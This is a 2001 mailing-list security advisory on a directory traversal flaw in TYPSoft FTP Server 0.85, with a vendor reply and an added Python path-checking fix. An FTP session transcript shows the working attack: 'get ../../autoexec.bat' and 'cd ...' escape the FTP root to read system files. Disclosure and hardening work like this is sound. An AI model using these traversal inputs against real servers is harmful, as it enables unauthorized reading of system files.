Date: Wed, 28 Feb 2001 18:27:57 -0500
From: [email protected]
To: [email protected]
Subject: Vulnerability in TYPSoft FTP Server
Vulnerability in TYPSoft FTP Server
Overview
TYPSoft FTP Server v0.85 is an FTP server available from
http://www.webmasterfree.com and http://typsoft.n3.net. A vulnerability
exists which allows a remote attacker to break out of the FTP root using
relative paths (i.e. '...') that the server does not reject.
Details
The following session illustrates the problem: CWD refuses a literal '..',
but GET passes '../../' through untouched, and CWD accepts '...', which the
host resolves above the FTP root:
% ftp localhost
Connected to xxxxxxxxxx.rh.rit.edu.
220 TYPSoft FTP Server 0.85 ready...
User (xxxxxxxxxx.rh.rit.edu:(none)): jdog
331 Password required for jdog.
Password:
230 User jdog logged in.
ftp> pwd
257 "/C:/directory/directory/" is current directory.
ftp> get ../../autoexec.bat
200 Port command successful.
150 Opening data connection for ../../autoexec.bat.
226 Transfer complete.
ftp: 383 bytes received in 0.06Seconds 6.38Kbytes/sec.
ftp> cd ..
501 CWD failed. No permission
ftp> cd ...
250 CWD command successful. "/C:/directory/directory/.../" is current directory.
ftp> pwd
257 "/C:/directory/directory/.../" is current directory.
ftp> get config.sys
200 Port command successful.
150 Opening data connection for config.sys.
226 Transfer complete.
ftp: 89 bytes received in 0.05Seconds 1.78Kbytes/sec.
ftp>
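As an added example (not code from this advisory or from TYPSoft), the weak check below reconstructs the behaviour the session shows, and resolve_within_root is a hardened replacement that resolves a CWD or RETR argument lexically and refuses anything that would leave the root; the root path, directory names and file names are constructed.

```python
FTP_ROOT = "C:/directory/directory"  # constructed; mirrors the advisory's "/C:/directory/directory/"


def weak_cwd_check(requested):
    """Reconstruction of the behaviour the session shows (assumption, not
    TYPSoft's code): only the exact argument '..' is refused, so '...' and
    '../../autoexec.bat' are both let through."""
    return requested != ".."


def resolve_within_root(root, cwd, requested):
    """Resolve `requested` (an FTP CWD/RETR argument) lexically against the
    client's current directory `cwd` (relative to `root`).  Returns the
    server-side path if it stays inside `root`, otherwise None."""
    path = requested.replace("\\", "/")          # Windows hosts accept both separators
    parts = [] if path.startswith("/") else [p for p in cwd.split("/") if p]
    for comp in path.split("/"):
        if comp in ("", "."):
            continue                              # empty or current-directory component
        if comp == "..":
            if not parts:
                return None                       # already at the root: refuse, don't clamp
            parts.pop()
            continue
        if set(comp) == {"."}:
            # '...' and longer dot runs: the filesystem may collapse them to a
            # parent directory (the advisory shows exactly that), so refuse
            # them outright rather than guess.
            return None
        parts.append(comp)
    return root.rstrip("/") + "/" + "/".join(parts)


if __name__ == "__main__":
    # The three requests from the advisory's session, issued from the FTP root.
    for arg in ("../../autoexec.bat", "..", "..."):
        print(f"{arg!r:22} weak: {weak_cwd_check(arg)!s:5} "
              f"hardened: {resolve_within_root(FTP_ROOT, '', arg)}")
```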
Solution
> Date: Sat, 24 Feb 2001 01:39:23 -0500
> Subject: Re: Vulnerability in TYPSoft FTP Server
> From: TYPSoft <[email protected]>
> To: [email protected]
>
> Hi
> I have tried to fix this problem.
> A test I have made seems to be OK.
> Thanks for the report
>
> Marc
> TYPSoft
Unfortunately, I do not have the resources to verify this fix at
this time. Thus, I urge users to proceed with caution.
Vendor Status
TYPSoft was contacted via <[email protected]> on Wednesday, February
21, 2001.
- Joe Testa ( e-mail: [email protected] / AIM: LordSpankatron )